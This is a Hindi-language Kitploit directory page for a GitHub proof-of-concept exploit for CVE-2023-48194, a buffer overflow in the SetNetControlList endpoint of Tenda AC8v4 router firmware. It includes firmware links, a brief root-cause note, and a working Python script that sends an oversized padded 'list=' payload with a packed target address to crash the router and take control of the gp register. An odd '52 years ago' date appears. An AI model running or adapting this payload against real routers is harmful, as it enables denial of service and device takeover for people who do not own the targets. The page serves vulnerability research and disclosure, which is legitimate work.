Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-48194 — Tenda AC8v4 राउटर फर्मवेयर (V16.03.34.09) में SetNetControlList एंडपॉइंट के माध्यम से बफर ओवरफ्लो भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो gp रजिस्टर पर नियंत्रण प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/zt20xx/cve-2023-48194
एम्बेडेड सिस्टम सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणफज़िंगहार्डवेयर और IoT सुरक्षाबाइनरी शोषण
GitHubzt20xx/cve-2023-48194

CVE-2023-48194

Tenda AC8v4 राउटर फर्मवेयर (V16.03.34.09) में SetNetControlList एंडपॉइंट के माध्यम से बफर ओवरफ्लो भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो gp रजिस्टर पर नियंत्रण प्रदर्शित करता है।

रिपॉजिटरी देखें
52 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-48194

अवलोकन

फ़र्मवेयर डाउनलोड वेबसाइट:

https://www.tenda.com.cn/download/detail-3683.html

https://down.tenda.com.cn/uploadfile/AC8/V16.03.34.09.zip

https://static.tenda.com.cn/tdcweb/download/uploadfile/AC8/V16.03.34.09.zip

प्रभावित संस्करण

AC8/V16.03.34.09

भेद्यता विवरण

Tenda AC8v4 .V16.03.34.09. sscanf के कारण, s8 का अंतिम अंक \x0 से अधिलेखित हो जाता है। set_client_qos निष्पादित करने के बाद, gp रजिस्टर पर नियंत्रण प्राप्त होता है

image-20231110220324578

image-20231111010734363

image-20231110211938397

PoC

इसे Segmentation fault (core dumped) बनाने के लिए एक poc

root@kitploit:~
import requests
url = 'http://192.168.0.1/goform/SetNetControlList'
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36',
    'Accept': '*/*',
    'Accept-Encoding': 'gzip, deflate',
    'Accept-Language': 'zh-CN,zh;q=0.9',
    'Connection': 'close',
    'Content-Length': '3003'
}
payload=b"list="

pad=0x407ff818-0x407ff7c0
from pwn import *
target=0x40302010
target=p32(target)
payload+=b"a"*(pad)+target+b"c"*(0x110-pad)
# list len >=0x100
try:
    requests.post(url, headers=headers, data=payload,timeout=3)
except requests.exceptions.ReadTimeout:
    print("test ok")

image-20240706214512012

sscanf से पहले

image-20231110215023268

बाद में, और ret करेगा

image-20231110215635663

image-20231110222010134

image-20231110222523163

टूल डाउनलोड करें